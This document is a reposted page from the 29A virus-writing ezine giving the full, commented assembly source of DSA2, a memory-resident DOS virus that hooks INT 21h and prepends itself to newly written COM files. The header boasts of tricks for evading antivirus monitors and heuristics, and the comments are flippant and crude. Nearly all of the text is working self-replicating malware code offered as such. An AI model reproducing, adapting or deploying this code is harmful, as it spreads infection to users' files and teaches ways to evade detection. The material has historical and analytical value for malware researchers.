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29A Issue 03 06 08

eZine's profile picture
Published in 
 · 28 Dec 2019


;=====( DSA2 Virus by Rajaat / 29A )===========================================
; Virus name : DSA2
; Author : Rajaat / 29A
; Origin : United Kingdom, December 1997
; Compiling : Using TASM
; Targets : COM files
; Size : 245 bytes
; Resident : Yes, doesn't decrease memory
; Polymorphic : No
; Encrypted : No
; Stealth : No
; Tunneling : Uses SFT to avoid some monitors
; Retrovirus : No
; Antiheuristics: Only TBSpoof
; Peculiarities : It won't get far
; Drawbacks : Don't write me, I know all of them ;-)
; Behaviour : When an infected COM file is executed, the virus will
; go resident in the stack reserved for dos INT 21
; functions <0ch and hook INT 21. There will be no
; visible decrease in conventional memory. The virus
; will then pass control to the host by shifting the
; whole host back over the virus code (this virus is
; prepending). From now, every COM file of 0 bytes in
; length that is written to (except for misnamed EXE
; files) will get infected. If a write is done, DSA2
; check wether the current filesize is 0, the file
; handle does not belong to a device, the amount of
; which will be written is not too big or too small and
; last but not least wether it is already infected or
; not. If all requirements are met, DSA2 will write
; itself to the file and then let the original write
; proceed. This makes DSA2 a slow infector and doesn't
; need a critical error handler.
; It's unknown what this virus might do besides replicate :)
; Well, actually this virus is a little combination of
; two other viruses that are both written by me,
; Andropinis and DSA. The virus will use some tricks to
; make it tough to av programs to detect the virus and
; to remove it heuristically. There is no decrease in
; conventional memory and it isn't very noticeable.
; Unfortunately there are not many COM files in use now
; anymore, but that's how the cookie crumbles.
; Thanks to Sandy for lashing me to work and comment
; this virus, and the rest for supporting me.
; As a side note, I want to dedicate this virus to a
; friend of mine who had some very traumatic experience
; with a car and a dog. I wish him luck and I hope he
; recovers soon enough and can leave the mental
; institute again.... Naaaah just kidding :*)
; UK != OK
;=====( Start of code )========================================================

.model tiny ; tiny tidy shitty whatever
.code ; what I always wanted to do
.radix 16 ; I think in HEX
.286 ; I am tired of XT weenies. spend some
; money and buy a REAL machine

org 100 ; com offset

main: push ax ; TBSpoof (not for newer versions)
dec bx

cld ; clear direction bit (wow!)

lea bx,main ; Squeeze doggy.. eehhh entrypoint on
push bx ; the stack

;=====( Some wise words from Ralph Brown )=====================================
; AX = 5D06h
; Return:
; CF set on error AX = error code (see #1020)
; CF clear if successful DS:SI -> nonreentrant data area (includes all three D
; DOS stacks) (critical error flag is first
; byte) (see #1027)
; CX = size in bytes of area which must be swapped
; while in DOS
; DX = size in bytes of area which must always be
; swapped
;=====( Thank you sir! )=======================================================

mov ax,5d06 ; see above piece
int 21

xchg ax,si ; swap si to ax
test al,0f ; is it paragraph aligned? (should be)
jnz is_resident ; no, bummer, we are resident :-)

shr ax,4 ; convert it to segment address
add al,50 ; add paragraphs to stack - 10h
mov di,ds ;
add ax,di ; add ds to the converted paragraphs
push cs ;
pop ds ; I like Snoop Doggy Dog $-)
mov es,ax ;

cmp word ptr es:[bx],'KP' ; are we there yet?
jz is_resident ; yes, bailout time

mov si,bx ; get start address of virus
mov di,bx ; in both source and destination

mov cx,virus_size ; and move the virus to the dos
rep movsb ; stack

push es ; whoop, some segment juggling here
pop ds ; for my ease

mov ax,3521 ; now where did I put that int 21h
int 21 ; vector to? let's kindly ask DOS to
mov word ptr int_21,bx ; provide that for me, and store it
mov word ptr int_21+2,es; into my memory

mov ah,25 ; in order to be able to replicate, the
lea dx,new_21 ; virus hooks int 21h itself
int 21 ;

;=====( Return to host handler )===============================================

is_resident: pop di ; this was the pushed bx register &^)
pop ax ; this was the pushed ax register @:-)
push cs ; clean some segment registers by
push cs ; setting them to the code segment
pop ds ; again...
pop es ;
push 0c3a4 ; now this is what makes this puppy a
push 0f357 ; bit special, it pushes a rep movsb
push sp ; and a ret on the stack and the stack
lea si,virus_end ; its own address and then jumps to the
mov cx,5 ; stack, which shifts the complete host
host_size equ $-2 ; down and then returns to 100h

db '[DSA2]' ; I could have called it DogCrusher,
db '[Rajaat/29A]' ; but I don't wanna hurt Jqwerty his
; feelings >8-)

;=====( Resident handler of the virus )========================================

new_21: cmp ah,40 ; is it a write action?
je write_to_file ; yea, let's go check it out

eoi_21: jmp dword ptr cs:[int_21] ; thank you, drive through

write_to_file: push ax ; i don't want to spoil these registers
push bx ; so I push them on the stack.
push dx ;
push di ;
push es ; hahahahahaha

mov ax,4400 ; check if the file belongs to a device
int 21 ; or not....
test dl,80 ;
jnz not_suitable ; if so, it's not for use.

mov ax,1220 ; get the file handle table for the
int 2f ; file handle that is now in bx
mov bl,byte ptr es:[di] ;
mov ax,1216 ; jq performs it doggy style ;-)
int 2f ;

mov bx,2020 ; now we gonna check if the file has
mov ax,word ptr es:[di+28] ; a com extension. if it hasn't it
or ax,bx ; is bailout time again.
cmp ax,'oc' ;
jne not_suitable ; doesn't start with "co"
mov al,byte ptr es:[di+2a] ;
or al,bl ;
cmp al,'m' ; doesn't end with "m"
jne not_suitable ;

cmp word ptr es:[di+11],0 ; if the current file length is 0,
jne not_suitable ; the file has just been created,
; which is great, since this virus
; is a great slow infector

cmp cx,1000 ; if the file is too small for our
jb not_suitable ; liking, it's bailout time again
cmp cx,0f000 ; and if the file is too large we quit
jbe check_exe ; too, otherwise we jump to check_exe

not_suitable: pop es ; get the wasted register again from
pop di ; the stack we put them on some lines
pop dx ; above here.
is_renamed_exe: pop bx ;
pop ax ;
jmp eoi_21 ; and chain to the old interrupt 21h

check_exe: pop es ; get some registers we need
pop di ;
pop dx ;

mov bx,dx ; does the write contain an exe
cmp word ptr ds:[bx],'ZM' ; header?
je is_renamed_exe ; if so, we leave here.

cmp word ptr ds:[bx],'KP' ; is it already infected?
je is_renamed_exe ; yes, we leave again (are we exe?
; no but i hate multiple
; references)

;=====( Actual infection routine - very simplistic )============================

infect_com: pop bx ; get filehandle from stack
push bx ;

push cx ; same some values we need (length we
push dx ; wanted to write, and offset)
push ds ;

push cs ; write our own code before the
pop ds ; file as some extra attachment.
mov word ptr host_size,cx ; so we actually didn't have to
mov ah,40 ; open and close the file ourselves.
mov cx,virus_size ; this saves a lot of time, we don't
lea dx,main ; need an error handler.
pushf ;
call dword ptr cs:[int_21] ;

pop ds ; pop some registers
pop dx ;
pop cx ;
jmp is_renamed_exe ; and we are done

int_21 dd 0 ; here we store the original int 21h

virus_end equ $ ; end of virus ofcourse
virus_size equ virus_end-main ; the size of the virus

;=====( Host file )============================================================

mov ax,4c00 ; exit to dos with exit code
int 21 ; this is actually a carrier host

end main ; curtains fall... :-0

;=====( This is the the end, the very end, make the best of it, and goodbye )==

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